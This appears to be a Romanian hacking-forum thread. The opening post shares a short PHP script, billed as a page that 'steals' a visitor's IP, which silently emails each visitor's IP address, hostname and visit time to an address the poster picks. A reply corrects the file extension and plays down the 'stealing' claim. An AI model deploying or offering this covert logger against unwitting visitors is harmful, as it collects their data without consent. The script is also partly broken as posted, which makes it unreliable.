Jump to content
Sub_Zero

O pagina web cu care furi ip-ul celui care o viziteaza

Recommended Posts

<?

$ip = $REMOTE_ADDR;

$host = gethostbyaddr($ip);

$date = date("d/m/Y H:i:s");

$email = "bighackeur@Mcft.com";

$sujet = "Ip + Host";

$message = "<html><body>Moment : $date
Ip : $ip
Host : $host</body></html>";

if(mail($email,$sujet,$message,"Content-Type: text/html")){

echo "Ownneeed";}

else { echo "Shit ?";}

?>

salveaza acest script cu extensia de .html si inlocuieste bighackeur@Mcft.com cu adresa ta de mail.

Enjoy... ;)

Link to comment
Share on other sites

In primul rand: voi can postati verificati ce ati scris si pe urma scriptul sau programul postat ? Eu asa stiam ca se face...

1.In loc de .html, pagina trebuie pusa .php [ testat/merge ]

2.Ce intelegeti voi prin furat ip-ul ? Scriptul pur si simplu trimite adresa de ip, hostname-ul [ victimei voastre ] si data la care a fost accesata pagina la o adresa de mail aleasa de voi. Nu fura ip-ul, nu il imprumuta, nu il vede etc. Doar trimite mail cu informatiile de mai sus [ ip, host, date ]

Btw: Toata lumea stie ca fiecare vrem sa avem mai multe posturi, dar calitatea conteaza, nu contitatea.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...